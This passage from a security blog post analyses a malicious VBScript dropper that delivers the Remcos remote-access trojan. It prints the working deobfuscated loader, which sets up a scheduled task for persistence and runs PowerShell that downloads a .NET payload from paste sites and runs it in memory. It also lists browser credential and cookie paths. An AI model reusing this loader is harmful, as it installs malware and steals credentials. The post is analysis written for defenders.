ffd%XwBf\ufffd%F8\ufffd%XwBf\ufffd%F8\ufffd%XwBf\ufffd%F8\ufffd%XwBf\ufffd%F8\ufffd%XwBf\ufffd%F8\ufffd%XwBf\ufffd%F8\ufffd%XwBf\ufffd%F8\ufffd%LQ\ufffd%t\ufffd%C0\ufffd%LQ\ufffd%t\ufffd%C0\ufffd%LQ\ufffd%n\ufffd%Cw\ufffd%I\ufffd%\ufffd%k\ufffd%GU\ufffd%bwBo\ufffd%GU\ufffd%cQ\ufffd%s\ufffd%C\ufffd%\ufffd%Jw\ufffd%x\ufffd%Cc\ufffd%L\ufffd%\ufffd%g\ufffd%Cc\ufffd%UgBv\ufffd%GQ\ufffd%YQ\ufffd%n\ufffd%C\ufffd%\ufffd%KQ\ufffd%p\ufffd%Ds\ufffd%&quot;)\r\n\r\n$eoheq = &#039;03&#039;;\r\n$rdaun = &#039;%pzAcOgInMr%&#039;;\r\nByte&#x5B;]] $dhgll = &#x5B;system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString(&#039;https:\/\/textbin.net\/raw\/ezjmofz3s6&#039;) ) 
);\r\n&#x5B;system.AppDomain]::CurrentDomain.Load($dhgll).GetType(&#039;Maracaibo.Class1&#039;).GetMethod(&#039;MsqBIbY&#039;).Invoke($null, &#x5B;object&#x5B;]] (&#039;0\/KwBRW\/d\/ee.etsap\/\/:sptth&#039; , $rdaun , &#039;____________________________________________-------&#039;, $eoheq, &#039;1&#039;, &#039;Roda&#039; ));\r\n\r\ndim waalb\r\nwaalb = (&quot;$dgUdYL = &#039;&quot;) &amp;amp;amp;amp;amp;amp;amp; HwxcO &amp;amp;amp;amp;amp;amp;amp; &quot;&#039;&quot; \r\nwaalb = waalb &amp;amp;amp;amp;amp;amp;amp; &quot;;\r\n$KByHL = &#x5B;system.Text.Encoding]::Unicode.GetString( &quot;\r\n\r\nwaalb = waalb &amp;amp;amp;amp;amp;amp;amp; &quot;&#x5B;system.Convert]::FromBase64String( $dgUdYL.replace(&#039;\ufffd%&#039;,&#039;A&#039;) ) )&quot;\r\n&#039;DgWuA and returns whether JoYB is enabled or disabled. Flavors are JoYB PTNJlzJZf,\r\n\r\n&#039;\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\r\n&#039;\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\r\nwaalb = waalb &amp;amp;amp;amp;amp;amp;amp; &quot;;\r\n$KByHL = $KByHL.replace(&#039;%pzAcOgInMr%&#039;, &#039;&quot; &amp;amp;amp;amp;amp;amp;amp; ARmxU &amp;amp;amp;amp;amp;amp;amp; &quot;&#039;);powershell -command $KByHL;&quot; \r\n\r\nset sjddc = CreateObject(&quot;WScript.Shell&quot;)\r\nsjddc.Run &quot;powershell -command &quot; &amp;amp;amp;amp;amp;amp;amp; (waalb) , 0, false\r\nEnd function\r\nSet JYXNc = 
vkrLKQUSi(&quot;lsZsUULOa&quot;)\r\n&#039;\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\r\n&#039;\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\r\n<\/pre>\n<p>Quickly looking at the remains of the script and just checking the different variables here and there, it looks like the actual script is just the below part.<\/p>\n<p><strong>NOTE:<\/strong> I am not fluent in the way of coding\/scripting, so I could be very off the mark here. If so, please let me know.<\/p>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\nSet objShell = CreateObject(&quot;WScript.Shell&quot;)\r\nzoologico = &quot;MinhaTarefaVBScript&quot;\r\neCoeCoeCoeCo = &quot;schtasks \/delete \/tn &quot; &amp;amp;amp;amp;amp;amp;amp; zoologico &amp;amp;amp;amp;amp;amp;amp; &quot; \/f&quot;\r\nobjShell.Run eCoeCoeCoeCo, 0, True\r\nstrScriptPath = WScript.ScriptFullName\r\nstrTempFolder = objShell.ExpandEnvironmentStrings(&quot;%TEMP%&quot;)\r\nMirasoles = strTempFolder &amp;amp;amp;amp;amp;amp;amp; &quot;\\SeuScript.vbs&quot;\r\n&#039; Cria um objeto FileSystemObject\r\nSet objFSO = CreateObject(&quot;Scripting.FileSystemObject&quot;)\r\nOn Error Resume Next\r\n&#039; Tenta copiar o arquivo para a pasta tempor\ufffdria\r\nobjFSO.CopyFile strScriptPath, Mirasoles, True\r\nIf Err.Number &amp;amp;amp;amp;amp;amp;lt;&amp;amp;amp;amp;amp;amp;gt; 0 Then\r\nMsgBox &quot;Erro ao copiar o arquivo para a pasta tempor\ufffdria: &quot; &amp;amp;amp;amp;amp;amp;amp; Err.Description\r\nEnd If\r\nOn Error GoTo 0\r\nstrCreateCommand = &quot;schtasks \/create \/tn &quot; &amp;amp;amp;amp;amp;amp;amp; zoologico &amp;amp;amp;amp;amp;amp;amp; &quot; \/tr &quot;&quot;&quot; 
&amp;amp;amp;amp;amp;amp;amp; Mirasoles &amp;amp;amp;amp;amp;amp;amp; &quot;&quot;&quot; \/sc minute \/mo 1&quot;\r\nobjShell.Run strCreateCommand, 0, True\r\nend if\r\nmmhou:lvueu:mmhou:lvueu:mmhou:lvueu:mmhou:lvueu:mmhou:\r\ndim ARmxU \r\n\r\nARmxU = WScript.ScriptFullName\r\nHwxcO = (&quot;J\ufffd%Bl\ufffd%G8\ufffd%a\ufffd%Bl\ufffd%HE\ufffd%I\ufffd%\ufffd%9\ufffd%C\ufffd%\ufffd%Jw\ufffd%w\ufffd%DM\ufffd%Jw\ufffd%7\ufffd%CQ\ufffd%cgBk\ufffd%GE\ufffd%dQBu\ufffd%C\ufffd%\ufffd%PQ\ufffd%g\ufffd%Cc\ufffd%JQBw\ufffd%Ho\ufffd%QQBj\ufffd%E8\ufffd%ZwBJ\ufffd%G4\ufffd%TQBy\ufffd%CU\ufffd%Jw\ufffd%7\ufffd%Fs\ufffd%QgB5\ufffd%HQ\ufffd%ZQBb\ufffd%F0\ufffd%XQ\ufffd%g\ufffd%CQ\ufffd%Z\ufffd%Bo\ufffd%Gc\ufffd%b\ufffd%Bs\ufffd%C\ufffd%\ufffd%PQ\ufffd%g\ufffd%Fs\ufffd%cwB5\ufffd%HM\ufffd%d\ufffd%Bl\ufffd%G0\ufffd%LgBD\ufffd%G8\ufffd%bgB2\ufffd%GU\ufffd%cgB0\ufffd%F0\ufffd%Og\ufffd%6\ufffd%EY\ufffd%cgBv\ufffd%G0\ufffd%QgBh\ufffd%HM\ufffd%ZQ\ufffd%2\ufffd%DQ\ufffd%UwB0\ufffd%HI\ufffd%aQBu\ufffd%Gc\ufffd%K\ufffd%\ufffd%g\ufffd%Cg\ufffd%TgBl\ufffd%Hc\ufffd%LQBP\ufffd%GI\ufffd%agBl\ufffd%GM\ufffd%d\ufffd%\ufffd%g\ufffd%E4\ufffd%ZQB0\ufffd%C4\ufffd%VwBl\ufffd%GI\ufffd%QwBs\ufffd%Gk\ufffd%ZQBu\ufffd%HQ\ufffd%KQ\ufffd%u\ufffd%EQ\ufffd%bwB3\ufffd%G4\ufffd%b\ufffd%Bv\ufffd%GE\ufffd%Z\ufffd%BT\ufffd%HQ\ufffd%cgBp\ufffd%G4\ufffd%Zw\ufffd%o\ufffd%C\ufffd%\ufffd%K\ufffd%BO\ufffd%GU\ufffd%dw\ufffd%t\ufffd%E8\ufffd%YgBq\ufffd%GU\ufffd%YwB0\ufffd%C\ufffd%\ufffd%TgBl\ufffd%HQ\ufffd%LgBX\ufffd%GU\ufffd%YgBD\ufffd%Gw\ufffd%aQBl\ufffd%G4\ufffd%d\ufffd%\ufffd%p\ufffd%C4\ufffd%R\ufffd%Bv\ufffd%Hc\ufffd%bgBs\ufffd%G8\ufffd%YQBk\ufffd%FM\ufffd%d\ufffd%By\ufffd%Gk\ufffd%bgBn\ufffd%Cg\ufffd%JwBo\ufffd%HQ\ufffd%d\ufffd%Bw\ufffd%HM\ufffd%Og\ufffd%v\ufffd%C8\ufffd%d\ufffd%Bl\ufffd%Hg\ufffd%d\ufffd%Bi\ufffd%Gk\ufffd%bg\ufffd%u\ufffd%G4\ufffd%ZQB0\ufffd%C8\ufffd%cgBh\ufffd%Hc\ufffd%LwBl\ufffd%Ho\ufffd%agBt\ufffd%G8\ufffd%ZgB6\ufffd%DM\ufffd%cw\ufffd%2\ufffd%Cc\ufffd%KQ\ufffd%g\ufffd%Ck\ufffd%I\ufffd%\ufffd%p\uff
fd%Ds\ufffd%WwBz\ufffd%Hk\ufffd%cwB0\ufffd%GU\ufffd%bQ\ufffd%u\ufffd%EE\ufffd%c\ufffd%Bw\ufffd%EQ\ufffd%bwBt\ufffd%GE\ufffd%aQBu\ufffd%F0\ufffd%Og\ufffd%6\ufffd%EM\ufffd%dQBy\ufffd%HI\ufffd%ZQBu\ufffd%HQ\ufffd%R\ufffd%Bv\ufffd%G0\ufffd%YQBp\ufffd%G4\ufffd%LgBM\ufffd%G8\ufffd%YQBk\ufffd%Cg\ufffd%J\ufffd%Bk\ufffd%Gg\ufffd%ZwBs\ufffd%Gw\ufffd%KQ\ufffd%u\ufffd%Ec\ufffd%ZQB0\ufffd%FQ\ufffd%eQBw\ufffd%GU\ufffd%K\ufffd%\ufffd%n\ufffd%E0\ufffd%YQBy\ufffd%GE\ufffd%YwBh\ufffd%Gk\ufffd%YgBv\ufffd%C4\ufffd%QwBs\ufffd%GE\ufffd%cwBz\ufffd%DE\ufffd%Jw\ufffd%p\ufffd%C4\ufffd%RwBl\ufffd%HQ\ufffd%TQBl\ufffd%HQ\ufffd%a\ufffd%Bv\ufffd%GQ\ufffd%K\ufffd%\ufffd%n\ufffd%E0\ufffd%cwBx\ufffd%EI\ufffd%SQBi\ufffd%Fk\ufffd%Jw\ufffd%p\ufffd%C4\ufffd%SQBu\ufffd%HY\ufffd%bwBr\ufffd%GU\ufffd%K\ufffd%\ufffd%k\ufffd%G4\ufffd%dQBs\ufffd%Gw\ufffd%L\ufffd%\ufffd%g\ufffd%Fs\ufffd%bwBi\ufffd%Go\ufffd%ZQBj\ufffd%HQ\ufffd%WwBd\ufffd%F0\ufffd%I\ufffd%\ufffd%o\ufffd%Cc\ufffd%M\ufffd%\ufffd%v\ufffd%Es\ufffd%dwBC\ufffd%FI\ufffd%Vw\ufffd%v\ufffd%GQ\ufffd%LwBl\ufffd%GU\ufffd%LgBl\ufffd%HQ\ufffd%cwBh\ufffd%H\ufffd%\ufffd%Lw\ufffd%v\ufffd%Do\ufffd%cwBw\ufffd%HQ\ufffd%d\ufffd%Bo\ufffd%Cc\ufffd%I\ufffd%\ufffd%s\ufffd%C\ufffd%\ufffd%J\ufffd%By\ufffd%GQ\ufffd%YQB1\ufffd%G4\ufffd%I\ufffd%\ufffd%s\ufffd%C\ufffd%\ufffd%JwBf\ufffd%F8\ufffd%XwBf\ufffd%F8\ufffd%XwBf\ufffd%F8\ufffd%XwBf\ufffd%F8\ufffd%XwBf\ufffd%F8\ufffd%XwBf\ufffd%F8\ufffd%XwBf\ufffd%F8\ufffd%XwBf\ufffd%F8\ufffd%XwBf\ufffd%F8\ufffd%XwBf\ufffd%F8\ufffd%XwBf\ufffd%F8\ufffd%XwBf\ufffd%F8\ufffd%XwBf\ufffd%F8\ufffd%XwBf\ufffd%F8\ufffd%XwBf\ufffd%F8\ufffd%LQ\ufffd%t\ufffd%C0\ufffd%LQ\ufffd%t\ufffd%C0\ufffd%LQ\ufffd%n\ufffd%Cw\ufffd%I\ufffd%\ufffd%k\ufffd%GU\ufffd%bwBo\ufffd%GU\ufffd%cQ\ufffd%s\ufffd%C\ufffd%\ufffd%Jw\ufffd%x\ufffd%Cc\ufffd%L\ufffd%\ufffd%g\ufffd%Cc\ufffd%UgBv\ufffd%GQ\ufffd%YQ\ufffd%n\ufffd%C\ufffd%\ufffd%KQ\ufffd%p\ufffd%Ds\ufffd%&quot;)\r\n\r\n$eoheq = &#039;03&#039;;\r\n$rdaun = &#039;%pzAcOgInMr%&#039;;\r\nByte&#x5B;]] $dhgll = 
&#x5B;system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString(&#039;https:\/\/textbin.net\/raw\/ezjmofz3s6&#039;) ) );\r\n&#x5B;system.AppDomain]::CurrentDomain.Load($dhgll).GetType(&#039;Maracaibo.Class1&#039;).GetMethod(&#039;MsqBIbY&#039;).Invoke($null, &#x5B;object&#x5B;]] (&#039;0\/KwBRW\/d\/ee.etsap\/\/:sptth&#039; , $rdaun , &#039;____________________________________________-------&#039;, $eoheq, &#039;1&#039;, &#039;Roda&#039; ));\r\n\r\ndim waalb\r\nwaalb = (&quot;$dgUdYL = &#039;&quot;) &amp;amp;amp;amp;amp;amp;amp; HwxcO &amp;amp;amp;amp;amp;amp;amp; &quot;&#039;&quot; \r\nwaalb = waalb &amp;amp;amp;amp;amp;amp;amp; &quot;;\r\n$KByHL = &#x5B;system.Text.Encoding]::Unicode.GetString( &quot;\r\n\r\nwaalb = waalb &amp;amp;amp;amp;amp;amp;amp; &quot;&#x5B;system.Convert]::FromBase64String( $dgUdYL.replace(&#039;\ufffd%&#039;,&#039;A&#039;) ) )&quot;\r\n&#039;DgWuA and returns whether JoYB is enabled or disabled. Flavors are JoYB PTNJlzJZf,\r\n\r\n\r\nwaalb = waalb &amp;amp;amp;amp;amp;amp;amp; &quot;;\r\n$KByHL = $KByHL.replace(&#039;%pzAcOgInMr%&#039;, &#039;&quot; &amp;amp;amp;amp;amp;amp;amp; ARmxU &amp;amp;amp;amp;amp;amp;amp; &quot;&#039;);powershell -command $KByHL;&quot; \r\n\r\nset sjddc = CreateObject(&quot;WScript.Shell&quot;)\r\nsjddc.Run &quot;powershell -command &quot; &amp;amp;amp;amp;amp;amp;amp; (waalb) , 0, false\r\nEnd function\r\n<\/pre>\n<p>So running through the script it seems that the initial section sets up:<\/p>\n<ul>\n<li>the creation of the object in memory<\/li>\n<li>the scheduled task within Windows<\/li>\n<li>using the %TEMP% environment variable to copy the VB script file into whatever the %TEMP% variable is on the system\n<ul>\n<li>so nice of the author to let the user know if there was an issue with copying the file to the %TEMP% directory via a pop-up &#8211; lulz<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<p>Further down there is a block of what appears to base64 encoded 
text with an additional character added in to it. The hint\u00a0 that this is a base64 string is due to the below line which is also replacing the additional character of &#8216;\ufffd%&#8217; with an &#8216;A&#8217;:<\/p>\n<pre class=\"brush: plain; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\nwaalb = waalb &amp;amp;amp;amp;amp;amp;amp; &quot;&#x5B;system.Convert]::FromBase64String( $dgUdYL.replace(&#039;\ufffd%&#039;,&#039;A&#039;) ) )&quot;\r\n<\/pre>\n<p>The following is the base64 block decoded using CyberChef once again.<\/p>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\n$eoheq = &#039;03&#039;;\r\n$rdaun = &#039;%pzAcOgInMr%&#039;;\r\nByte&#x5B;]] $dhgll = &#x5B;system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString(&#039;https:\/\/textbin.net\/raw\/ezjmofz3s6&#039;) ) );\r\n&#x5B;system.AppDomain]::CurrentDomain.Load($dhgll).GetType(&#039;Maracaibo.Class1&#039;).GetMethod(&#039;MsqBIbY&#039;).Invoke($null, &#x5B;object&#x5B;]] (&#039;0\/KwBRW\/d\/ee.etsap\/\/:sptth&#039; , $rdaun , &#039;____________________________________________-------&#039;, $eoheq, &#039;1&#039;, &#039;Roda&#039; ));\r\n<\/pre>\n<p>Ok cool. 
So if I am doing the deobfuscation correctly here, the bottom half of the script looks like this.<\/p>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\nARmxU = WScript.ScriptFullName\r\nHwxcO = (&quot;$eoheq = &#039;03&#039;; $rdaun = &#039;%pzAcOgInMr%&#039;; &amp;amp;amp;amp;amp;amp;nbsp;\r\nByte&#x5B;]] $dhgll = &#x5B;system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString(&#039;https:\/\/textbin.net\/raw\/ezjmofz3s6&#039;) ) );\r\n&#x5B;system.AppDomain]::CurrentDomain.Load($dhgll).GetType(&#039;Maracaibo.Class1&#039;).GetMethod(&#039;MsqBIbY&#039;).Invoke($null, &#x5B;object&#x5B;]] (&#039;0\/KwBRW\/d\/ee.etsap\/\/:sptth&#039; , %pzAcOgInMr% , &#039;____________________________________________-------&#039;, 03, &#039;1&#039;, &#039;Roda&#039; ));&quot;)\r\n\r\n$KByHL = $KByHL.replace(&#039;%pzAcOgInMr%&#039;, &#039;&quot; &amp;amp;amp;amp;amp;amp;amp; ARmxU &amp;amp;amp;amp;amp;amp;amp; &quot;&#039;);\r\npowershell -command $KByHL;&quot;\r\nset sjddc =&amp;amp;amp;amp;amp;amp;nbsp; CreateObject(&quot;WScript.Shell&quot;)\r\nsjddc.Run &quot;powershell -command &quot; &amp;amp;amp;amp;amp;amp;amp; (waalb) , 0, false\r\n<\/pre>\n<p>&nbsp;<\/p>\n<p>So the first URL that is listed (hxxps:\/\/textbin[.]net\/raw\/ezjmofz3s6) is a redirect (see the urlscan <a href=\"https:\/\/urlscan.io\/result\/2bb8b0fc-c0ae-4ee4-b4c0-ee7a7ef59748\/dom\/\" target=\"_blank\" rel=\"noopener\">here<\/a>) and goes to hxxps:\/\/pasteio[.]com\/download\/xNVOEKuDyLXR. 
I could not get the TXT file from URLScan as seen <a href=\"https:\/\/urlscan.io\/result\/e8c7df9e-2f49-4e64-aea5-f2587279b332\/dom\/\" target=\"_blank\" rel=\"noopener\">here<\/a>, so I ended up using <a href=\"https:\/\/app.any.run\/tasks\/47c47055-1498-44a5-8454-f2d4a1896343\" target=\"_blank\" rel=\"noopener\">Any.Run<\/a> to get the file, and then later using <a href=\"https:\/\/pasteio.com\/url-decoder\" target=\"_blank\" rel=\"noopener\">pasteio.com<\/a> to decode the URL to get the same identical file that I got from Any.Run. The file obtained from hxxps:\/\/pasteio[.]com\/download\/xNVOEKuDyLXR was a large base64 blob, which decoded from base64 looks to be a binary file (the <a href=\"https:\/\/www.virustotal.com\/gui\/search\/c92b586ab278e4d0390629f9039182d9d012e49605db44fb90db56951693a1be\" target=\"_blank\" rel=\"noopener\">hash<\/a> for this file was not found on VT).<\/p>\n<p><a href=\"https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/hash-pasteio.com_.png\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-large wp-image-1622\" src=\"https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/hash-pasteio.com_-1024x713.png\" alt=\"\" width=\"900\" height=\"627\" srcset=\"https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/hash-pasteio.com_-1024x713.png 1024w, https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/hash-pasteio.com_-300x209.png 300w, https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/hash-pasteio.com_-768x535.png 768w, https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/hash-pasteio.com_-150x104.png 150w, https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/hash-pasteio.com_.png 1520w\" sizes=\"auto, 
(max-width: 900px) 100vw, 900px\" \/><\/a><\/p>\n<p>A quick look at this file saved from CyberChef with strings was interesting but not fruitful per se. The output showed that there were references to <strong>both<\/strong> &#8216;Maracaibo&#8217; and &#8216;MsqBIbY&#8217;, but nothing else really. This told me that I would have to take a look at this file in dnSpy to see what was really going on.<\/p>\n<p>Moving further down the script to where the other URL is located, it looked to be some API calls that I have not seen before (or at least that I can remember), in particular &#8216;[system.AppDomain]::CurrentDomain.Load&#8217;, &#8216;GetType&#8217;, &#8216;GetMethod&#8217;, and &#8216;Invoke&#8217;. A quick Google of &#8216;[system.AppDomain]::CurrentDomain.Load&#8217; turned up <a href=\"https:\/\/learn.microsoft.com\/en-us\/dotnet\/api\/system.appdomain?view=net-8.0\" target=\"_blank\" rel=\"noopener\">this Microsoft page<\/a>, which gave some insight into what the API calls were doing in the script. 
The crux of this looked to be loading and running some code in memory.<\/p>\n<p>I also came across some other links from Fortinet back in 2021 that went over what looks to be a similar tactic for some malspam that delivered Agent Tesla back then.<\/p>\n<ul>\n<li><a href=\"https:\/\/www.fortinet.com\/blog\/threat-research\/phishing-campaign-targeting-korean-to-deliver-agent-tesla-new-variant\" target=\"_blank\" rel=\"noopener\">https:\/\/www.fortinet.com\/blog\/threat-research\/phishing-campaign-targeting-korean-to-deliver-agent-tesla-new-variant<\/a><\/li>\n<li><a href=\"https:\/\/www.avfirewalls.com\/60359\/breaking-new-phishing-malware-targets-bitcoin-addresses-heres-how-you-can-prevent-it\" target=\"_blank\" rel=\"noopener\">https:\/\/www.avfirewalls.com\/60359\/breaking-new-phishing-malware-targets-bitcoin-addresses-heres-how-you-can-prevent-it<\/a><\/li>\n<\/ul>\n<p>Fortinet discussed the code above being leveraged for process hollowing, which makes sense considering the different API calls being made. 
It made even more sense since one of the alerts from the initial VB script was for a process injection using &#8216;Regsvcs.exe&#8217;.<\/p>\n<p><a href=\"https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/processinjection.png\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-large wp-image-1625\" src=\"https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/processinjection-1024x640.png\" alt=\"\" width=\"900\" height=\"563\" srcset=\"https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/processinjection-1024x640.png 1024w, https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/processinjection-300x188.png 300w, https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/processinjection-768x480.png 768w, https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/processinjection-1536x960.png 1536w, https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/processinjection-150x94.png 150w, https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/processinjection.png 1640w\" sizes=\"auto, (max-width: 900px) 100vw, 900px\" \/><\/a><\/p>\n<p>So now knowing that there is some level of memory shenanigans going on here, it was time to see what goodies the other URL (hxxps:\/\/paste[.]ee\/d\/WRBwK\/0) had.<\/p>\n<p>Using curl against the hxxps:\/\/paste[.]ee\/d\/WRBwK\/0 URL gave me back the following:<\/p>\n<p><a href=\"https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/curl.png\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-large wp-image-1637\" src=\"https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/curl-1024x400.png\" alt=\"\" width=\"900\" height=\"352\" srcset=\"https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/curl-1024x400.png 1024w, https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/curl-300x117.png 300w, https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/curl-768x300.png 768w, https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/curl-1536x599.png 1536w, 
https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/curl-2048x799.png 2048w, https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/curl-150x59.png 150w\" sizes=\"auto, (max-width: 900px) 100vw, 900px\" \/><\/a><\/p>\n<p>which I then promptly put into CyberChef. CyberChef decided not to give me back anything useful, because the recipe I was using was flawed. Thankfully <a href=\"https:\/\/twitter.com\/Kaspertame\" target=\"_blank\" rel=\"noopener\">@kaspertame<\/a> threw me a lifeline and helped correct my misstep. The issues here were:<\/p>\n<ol>\n<li>I had left &#8216;remove null bytes&#8217; in my CyberChef recipe<\/li>\n<li>I didn&#8217;t realize that I needed to use &#8216;reverse&#8217; within CyberChef to format the data correctly\n<ol>\n<li>Granted, there was nothing in the script that would lead one to use the reverse recipe. More on this in a bit.<\/li>\n<\/ol>\n<\/li>\n<\/ol>\n<p><a href=\"https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/paste.ee_.binary.png\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-large wp-image-1626\" src=\"https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/paste.ee_.binary-1024x453.png\" alt=\"\" width=\"900\" height=\"398\" srcset=\"https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/paste.ee_.binary-1024x453.png 1024w, https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/paste.ee_.binary-300x133.png 300w, https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/paste.ee_.binary-768x340.png 768w, https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/paste.ee_.binary-1536x679.png 1536w, https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/paste.ee_.binary-2048x906.png 2048w, https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/paste.ee_.binary-150x66.png 150w\" sizes=\"auto, (max-width: 900px) 100vw, 900px\" \/><\/a><\/p>\n<p>Once I got things figured out in CyberChef, I was able to download the binary and cross-check the hash on <a 
href=\"https:\/\/www.virustotal.com\/gui\/file\/288a045071388145c559b70d4fc7ff27baae2a3fda629d88a5da8e47ad9ee1ae\" target=\"_blank\" rel=\"noopener\">VT<\/a> to see if it was a known hash &#8211; which it definitely was.<\/p>\n<p>I also did the same thing that I did with the other one and used strings to see what I could gather quickly from that output. Pretty quickly the strings output gave up some great details &#8211; especially the fact that someone was <em><strong>really<\/strong><\/em> proud of this being Remcos.<\/p>\n<p><a href=\"https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/remcos.png\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-1627\" src=\"https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/remcos.png\" alt=\"\" width=\"381\" height=\"363\" srcset=\"https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/remcos.png 381w, https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/remcos-300x286.png 300w, https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/remcos-150x143.png 150w\" sizes=\"auto, (max-width: 381px) 100vw, 381px\" \/><\/a><\/p>\n<p>Doing a couple of quick grep searches with strings was pretty interesting as well.<\/p>\n<pre class=\"brush: plain; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\n- strings paste.ee.exe | grep &quot;^\\&#x5B;.*&quot;\r\n&#x5B;End of clipboard]\r\n&#x5B;Ctrl+V]\r\n&#x5B;Text pasted from clipboard]\r\n&#x5B;Ctrl+\r\n&#x5B;AltL]\r\n&#x5B;AltR]\r\n&#x5B;CtrlL]\r\n&#x5B;CtrlR]\r\n&#x5B;End of clipboard]\r\n&#x5B;Text copied to clipboard]\r\n&#x5B;Chrome StoredLogins not found]\r\n&#x5B;Chrome StoredLogins found, cleared!]\r\n&#x5B;Chrome Cookies not found]\r\n&#x5B;Chrome Cookies found, cleared!]\r\n&#x5B;Firefox StoredLogins not found]\r\n&#x5B;Firefox StoredLogins Cleared!]\r\n&#x5B;Firefox Cookies not found]\r\n&#x5B;Firefox cookies found, cleared!]\r\n&#x5B;IE cookies not 
found]\r\n&#x5B;IE cookies cleared!]\r\n&#x5B;Cleared browsers logins and cookies.]\r\n\r\n- strings paste.ee.exe | grep &quot;AppData.*&quot;\r\n\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data\r\n\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies\r\n\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\\r\n<\/pre>\n<h4>File Analysis<br \/>\n===========<\/h4>\n<p>Switching gears, I moved the two files that I was able to pull down from the two URLs seen in the script on to my VM. Opening the first file from the <strong>pasteio.com<\/strong> site using dnSpy and looking for &#8216;Maracaibo.Class1&#8217; and the method &#8216;MsqBIbY&#8217; gave all kinds of great information. Information that I could make educated assumptions about (i.e. seeing the code for what I can only assume is the reverse function for the second URL as seen below, hence why it was not included in the script), but nothing that I could really dig further into due to the lack of skills here.<\/p>\n<p><strong>As a side note: <\/strong><a href=\"https:\/\/twitter.com\/IzzyBoopFPV\" target=\"_blank\" rel=\"noopener\">@IzzyBoopFPV<\/a> pointed out to me when we were talking about this, &#8220;das sum sussy baka shit right there [sic]&#8221;.<\/p>\n<p><a href=\"https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/MsqBIbY.png\"><img 